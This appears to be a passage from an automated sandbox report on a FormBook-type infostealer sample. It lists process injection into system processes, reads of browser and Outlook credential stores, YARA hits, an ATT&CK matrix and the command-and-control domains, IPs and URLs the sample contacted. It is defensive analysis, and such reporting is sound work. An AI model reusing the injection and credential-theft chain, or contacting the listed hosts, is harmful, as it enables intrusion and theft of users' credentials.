            Source: C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exeNtOpenFile: Direct from: 0x771C2CECJump to behavior
            Source: C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exeNtQueryInformationToken: Direct from: 0x771C2BCCJump to behavior
            Source: C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exeNtAllocateVirtualMemory: Direct from: 0x771C3BBCJump to behavior
            Source: C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exeNtTerminateThread: Direct from: 0x771C2EECJump to behavior
            Maps a DLL or memory area into another process
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: NULL target: C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: NULL target: C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Windows\SysWOW64\msiexec.exeThread register set: target process: 7304Jump to behavior
            Writes to foreign memory regions
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2995008Jump to behavior
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exeCode function: 0_2_0043916A LogonUserW,0_2_0043916A
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exeCode function: 0_2_0040D6D0 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,0_2_0040D6D0
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exeCode function: 0_2_004375B0 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_004375B0
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exeCode function: 0_2_00436431 mouse_event,mouse_event,0_2_00436431
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\p4rsJEIb7k.exe"Jump to behavior
            Source: C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exeCode function: 0_2_00445DD3 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00445DD3
            Source: p4rsJEIb7k.exe, BlltrVxNMs.exe, 00000002.00000002.9380853166.0000000001C40000.00000002.00000001.00040000.00000000.sdmp, BlltrVxNMs.exe, 00000002.00000000.4737047660.0000000001C40000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: BlltrVxNMs.exe, 00000002.00000002.9380853166.0000000001C40000.00000002.00000001.00040000.00000000.sdmp, BlltrVxNMs.exe, 00000002.00000000.4737047660.0000000001C40000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: p4rsJEIb7k.exeBinary or memory string: @3PDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning
            Source: BlltrVxNMs.exe, 00000002.00000002.9380853166.0000000001C40000.00000002.00000001.00040000.00000000.sdmp, BlltrVxNMs.exe, 00000002.00000000.4737047660.0000000001C40000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: BlltrVxNMs.exe, 00000002.00000002.9380853166.0000000001C40000.00000002.00000001.00040000.00000000.sdmp, BlltrVxNMs.exe, 00000002.00000000.4737047660.0000000001C40000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: yProgram ManagerF-
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exeCode function: 0_2_00410D10 cpuid 0_2_00410D10
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exeCode function: 0_2_004223BC GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,0_2_004223BC
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exeCode function: 0_2_004711D2 GetUserNameW,0_2_004711D2
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exeCode function: 0_2_0042039F GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,0_2_0042039F
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exeCode function: 0_2_0040E470 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_0040E470

            Stealing of Sensitive Information

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000001.00000002.4812307431.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.8170544463.0000000004FE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.9380185277.00000000015B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.9381714381.00000000050A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.4813936087.0000000003350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.8170470399.0000000004F90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.4815096590.0000000005800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\SysWOW64\msiexec.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
            Source: p4rsJEIb7k.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPWIN_2000InstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 6, 0USERPROFILEUSERDOMAINUSERDNSDOMAINDefaultGetSystemWow64DirectoryWSeDebugPrivilege:cdeclwinapistdcallnonestrwstrintbooluintlongulongdwordshortushortwordbyteubytebooleanfloatdoubleptrhwndhandlelresultlparamwparamint64uint64int_ptruint_ptrlong_ptrulong_ptrdword_ptridispatch64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYadvapi32.dllRegDeleteKeyExW+.-.+-\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]ISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXISTSEXPANDmsctls_statusbar321tooltips_class32AutoIt v3 GUI%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----
            Source: p4rsJEIb7k.exeBinary or memory string: WIN_XP
            Source: p4rsJEIb7k.exeBinary or memory string: WIN_XPe
            Source: p4rsJEIb7k.exeBinary or memory string: WIN_VISTA
            Source: p4rsJEIb7k.exeBinary or memory string: WIN_7

            Remote Access Functionality

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000001.00000002.4812307431.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.8170544463.0000000004FE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.9380185277.00000000015B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.9381714381.00000000050A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.4813936087.0000000003350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.8170470399.0000000004F90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.4815096590.0000000005800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exeCode function: 0_2_004741BB socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_004741BB
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exeCode function: 0_2_0046483C socket,WSAGetLastError,bind,WSAGetLastError,listen,WSAGetLastError,closesocket,0_2_0046483C
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exeCode function: 0_2_0047AD92 OleInitialize,CreateBindCtx,MkParseDisplayName,CLSIDFromProgID,GetActiveObject,0_2_0047AD92

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire Infrastructure2
            Valid Accounts            		1
            Native API            		1
            DLL Side-Loading            		1
            Exploitation for Privilege Escalation            		1
            Disable or Modify Tools            		1
            OS Credential Dumping            		2
            System Time Discovery            		Remote Services1
            Archive Collected Data            		4
            Ingress Tool Transfer            		Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault AccountsScheduled Task/Job2
            Valid Accounts            		1
            Abuse Elevation Control Mechanism            		1
            Deobfuscate/Decode Files or Information            		21
            Input Capture            		1
            Account Discovery            		Remote Desktop Protocol1
            Data from Local System            		1
            Encrypted Channel            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading            		1
            Abuse Elevation Control Mechanism            		Security Account Manager2
            File and Directory Discovery            		SMB/Windows Admin Shares1
            Email Collection            		4
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
            Valid Accounts            		3
            Obfuscated Files or Information            		NTDS116
            System Information Discovery            		Distributed Component Object Model21
            Input Capture            		4
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
            Access Token Manipulation            		1
            DLL Side-Loading            		LSA Secrets241
            Security Software Discovery            		SSH3
            Clipboard Data            		Fallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts312
            Process Injection            		2
            Valid Accounts            		Cached Domain Credentials2
            Virtualization/Sandbox Evasion            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
            Virtualization/Sandbox Evasion            		DCSync3
            Process Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
            Access Token Manipulation            		Proc Filesystem1
            Application Window Discovery            		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt312
            Process Injection            		/etc/passwd and /etc/shadow1
            System Owner/User Discovery            		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1549358 Sample: p4rsJEIb7k.exe Startdate: 05/11/2024 Architecture: WINDOWS Score: 100 31 www.pwk-24.xyz 2->31 33 www.030002832.xyz 2->33 35 21 other IPs or domains 2->35 39 Suricata IDS alerts for network traffic 2->39 41 Malicious sample detected (through community Yara rule) 2->41 43 Antivirus / Scanner detection for submitted sample 2->43 47 3 other signatures 2->47 10 p4rsJEIb7k.exe 1 2->10         started        signatures3 45 Performs DNS queries to domains with low reputation 33->45 process4 signatures5 57 Writes to foreign memory regions 10->57 59 Maps a DLL or memory area into another process 10->59 61 Switches to a custom stack to bypass stack traces 10->61 63 Contains functionality to detect sleep reduction / modifications 10->63 13 svchost.exe 10->13         started        process6 signatures7 65 Maps a DLL or memory area into another process 13->65 16 BlltrVxNMs.exe 13->16 injected process8 dnsIp9 25 www.brunvox.site 203.161.41.204, 49762, 49763, 49764 VNPT-AS-VNVNPTCorpVN Malaysia 16->25 27 hyman.life 15.197.148.33, 49786, 49787, 49788 TANDEMUS United States 16->27 29 10 other IPs or domains 16->29 37 Found direct / indirect Syscall (likely to bypass EDR) 16->37 20 msiexec.exe 13 16->20         started        signatures10 process11 signatures12 49 Tries to steal Mail credentials (via file / registry access) 20->49 51 Tries to harvest and steal browser information (history, passwords, etc) 20->51 53 Modifies the context of a thread in another process (thread injection) 20->53 55 2 other signatures 20->55 23 firefox.exe 20->23         started        process13

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            p4rsJEIb7k.exe68%ReversingLabsWin32.Trojan.AgentTesla
            p4rsJEIb7k.exe100%AviraTR/AutoIt.rwrjm
            p4rsJEIb7k.exe100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            https://www.nagasl89.baby/themes/rtp/js/skip-link-focus-fix.js0%Avira URL Cloudsafe
            http://www.030002832.xyz/o2wj/0%Avira URL Cloudsafe
            https://answers.netlify.com/t/support-guide-i-ve-deployed-my-site-but-i-still-see-page-not-found/1250%Avira URL Cloudsafe
            http://www.hyman.life/7sxb/0%Avira URL Cloudsafe
            https://practicaldev-herokuapp-com.freetls.fastly.net/assets/devlogo-pwa-512.png0%Avira URL Cloudsafe
            http://www.nidedabeille.net/oy0l/0%Avira URL Cloudsafe
            https://www.nagasl89.baby/themes/rtp/css/font.css0%Avira URL Cloudsafe
            https://www.nagasl89.baby/js/global.js0%Avira URL Cloudsafe
            http://www.wonders8.live/44hl/0%Avira URL Cloudsafe
            https://www.nagasl89.baby/themes/rtp/js/jquery-migrate.js0%Avira URL Cloudsafe
            https://dev-to.s3.us-east-2.amazonaws.com/favicon.ico0%Avira URL Cloudsafe
            http://abuali-contracting.art/ytnk/?Q2_4=uFAB3rEwaKr/uv81jElgMKFBplV4zOO0W/0UV/qGGe8UYgGdotW0%Avira URL Cloudsafe
            http://www.osi.garden/gqtu/0%Avira URL Cloudsafe
            http://www.notepad.mobi/zut6/0%Avira URL Cloudsafe
            http://cdn.jsinit.directfwd.com/sk-jspark_init.php0%Avira URL Cloudsafe
            http://www.parkerstraus.dev/ppmq/0%Avira URL Cloudsafe
            http://www.983743.vin/yg1w/0%Avira URL Cloudsafe
            https://www.nagasl89.baby/themes/rtp/js/jquery.js0%Avira URL Cloudsafe
            http://www.mynotebook.shop/sws3/0%Avira URL Cloudsafe
            https://www.nagasl89.baby/sitemap.xml0%Avira URL Cloudsafe
            https://www.nagasl89.baby/amp0%Avira URL Cloudsafe
            https://www.nagasl89.baby/0%Avira URL Cloudsafe
            https://www.nagasl89.baby/themes/rtp/css/style_v3.css0%Avira URL Cloudsafe
            http://www.brunvox.site/3qrm/0%Avira URL Cloudsafe
            http://www.abuali-contracting.art/ytnk/0%Avira URL Cloudsafe
            http://www.godskids.store/5g7z/0%Avira URL Cloudsafe
            https://www.nagasl89.baby/themes/rtp/genericons/genericons.css0%Avira URL Cloudsafe
            https://www.nagasl89.baby/feed/rss0%Avira URL Cloudsafe
            http://www.osi.garden0%Avira URL Cloudsafe
            https://www.nagasl89.baby/themes/rtp/js/functions.js0%Avira URL Cloudsafe
            https://www.nagasl89.baby/themes/twentyfifteen/js/html5.js0%Avira URL Cloudsafe
            https://www.nagasl89.baby/favicon.ico0%Avira URL Cloudsafe
            https://www.nagasl89.baby/themes/rtp/css/custom.css0%Avira URL Cloudsafe
            https://www.nagasl89.baby/themes/rtp/css/styleslot.css0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            osi.garden
            		68.65.122.222
            		truetrue
              		unknown
              www.nagasl89.baby
              		104.21.94.87
              		truefalse
                		unknown
                www.030002832.xyz
                		161.97.142.144
                		truetrue
                  		unknown
                  godskids.store
                  		3.33.130.190
                  		truetrue
                    		unknown
                    www.5oxzis.top
                    		20.2.217.253
                    		truefalse
                      		unknown
                      nidedabeille.net
                      		195.110.124.133
                      		truetrue
                        		unknown
                        www.brunvox.site
                        		203.161.41.204
                        		truetrue
                          		unknown
                          www.983743.vin
                          		45.150.55.15
                          		truetrue
                            		unknown
                            abuali-contracting.art
                            		66.198.240.15
                            		truetrue
                              		unknown
                              wonders8.live
                              		119.18.54.27
                              		truetrue
                                		unknown
                                www.notepad.mobi
                                		13.248.169.48
                                		truetrue
                                  		unknown
                                  hyman.life
                                  		15.197.148.33
                                  		truetrue
                                    		unknown
                                    www.mynotebook.shop
                                    		13.248.169.48
                                    		truetrue
                                      		unknown
                                      parkerstraus.netlify.app
                                      		50.19.214.227
                                      		truetrue
                                        		unknown
                                        www.parkerstraus.dev
                                        		unknown
                                        		unknowntrue
                                          		unknown
                                          www.nidedabeille.net
                                          		unknown
                                          		unknowntrue
                                            		unknown
                                            www.bav.lat
                                            		unknown
                                            		unknowntrue
                                              		unknown
                                              www.abuali-contracting.art
                                              		unknown
                                              		unknowntrue
                                                		unknown
                                                www.godskids.store
                                                		unknown
                                                		unknowntrue
                                                  		unknown
                                                  www.pwk-24.xyz
                                                  		unknown
                                                  		unknowntrue
                                                    		unknown
                                                    www.osi.garden
                                                    		unknown
                                                    		unknowntrue
                                                      		unknown
                                                      www.wonders8.live
                                                      		unknown
                                                      		unknowntrue
                                                        		unknown
                                                        www.hyman.life
                                                        		unknown
                                                        		unknowntrue
                                                          		unknown

                                                          Contacted URLs

                                                          NameMaliciousAntivirus DetectionReputation
                                                          http://www.nidedabeille.net/oy0l/true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.030002832.xyz/o2wj/true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.wonders8.live/44hl/true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.hyman.life/7sxb/true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.notepad.mobi/zut6/true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.mynotebook.shop/sws3/true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.983743.vin/yg1w/true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.parkerstraus.dev/ppmq/true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.osi.garden/gqtu/true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.abuali-contracting.art/ytnk/true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.godskids.store/5g7z/true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.brunvox.site/3qrm/true
                                                          • Avira URL Cloud: safe
                                                          		unknown

                                                          URLs from Memory and Binaries

                                                          NameSourceMaliciousAntivirus DetectionReputation
                                                          https://duckduckgo.com/chrome_newtabmsiexec.exe, 00000003.00000003.4995883349.000000000822B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.4999748750.0000000008296000.00000004.00000020.00020000.00000000.sdmp, -f1ZI14.3.drfalse
                                                            		high
                                                            https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/searchmsiexec.exe, 00000003.00000003.4995883349.000000000822B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.4999748750.0000000008296000.00000004.00000020.00020000.00000000.sdmp, -f1ZI14.3.drfalse
                                                              		high
                                                              https://duckduckgo.com/ac/?q=-f1ZI14.3.drfalse
                                                                		high
                                                                https://cdn.jsdelivr.net/npm/bootstrapfirefox.exe, 00000004.00000002.5103228729.0000000029CD4000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                  		high
                                                                  https://res.cloudinary.com/practicaldev/image/fetch/s--t7tVouP9--/c_limitBlltrVxNMs.exe, 00000002.00000002.9389382295.0000000005B74000.00000004.80000000.00040000.00000000.sdmp, msiexec.exe, 00000003.00000002.8171535667.0000000005C34000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000004.00000002.5103228729.0000000029CD4000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                    		high
                                                                    https://practicaldev-herokuapp-com.freetls.fastly.net/assets/devlogo-pwa-512.pngfirefox.exe, 00000004.00000002.5103228729.0000000029CD4000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    https://www.nagasl89.baby/js/global.jsBlltrVxNMs.exe, 00000002.00000002.9389382295.0000000005B74000.00000004.80000000.00040000.00000000.sdmp, msiexec.exe, 00000003.00000002.8171535667.0000000005C34000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000004.00000002.5103228729.0000000029CD4000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    https://www.nagasl89.baby/themes/rtp/css/font.cssBlltrVxNMs.exe, 00000002.00000002.9389382295.0000000005B74000.00000004.80000000.00040000.00000000.sdmp, msiexec.exe, 00000003.00000002.8171535667.0000000005C34000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000004.00000002.5103228729.0000000029CD4000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    https://www.nagasl89.baby/themes/rtp/js/jquery-migrate.jsBlltrVxNMs.exe, 00000002.00000002.9389382295.0000000005B74000.00000004.80000000.00040000.00000000.sdmp, msiexec.exe, 00000003.00000002.8171535667.0000000005C34000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000004.00000002.5103228729.0000000029CD4000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    https://www.nagasl89.baby/themes/rtp/js/skip-link-focus-fix.jsBlltrVxNMs.exe, 00000002.00000002.9389382295.0000000005B74000.00000004.80000000.00040000.00000000.sdmp, msiexec.exe, 00000003.00000002.8171535667.0000000005C34000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000004.00000002.5103228729.0000000029CD4000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.16.0/umd/popper.min.jsBlltrVxNMs.exe, 00000002.00000002.9389382295.0000000005B74000.00000004.80000000.00040000.00000000.sdmp, msiexec.exe, 00000003.00000002.8171535667.0000000005C34000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000004.00000002.5103228729.0000000029CD4000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                      		high
                                                                      https://res.cloudinary.com/practicaldev/image/fetch/s--E8ak4Hr1--/c_limitBlltrVxNMs.exe, 00000002.00000002.9389382295.0000000005B74000.00000004.80000000.00040000.00000000.sdmp, msiexec.exe, 00000003.00000002.8171535667.0000000005C34000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000004.00000002.5103228729.0000000029CD4000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                        		high
                                                                        https://answers.netlify.com/t/support-guide-i-ve-deployed-my-site-but-i-still-see-page-not-found/125BlltrVxNMs.exe, 00000002.00000002.9389382295.0000000006B28000.00000004.80000000.00040000.00000000.sdmp, msiexec.exe, 00000003.00000002.8171535667.0000000006BE8000.00000004.10000000.00040000.00000000.sdmpfalse
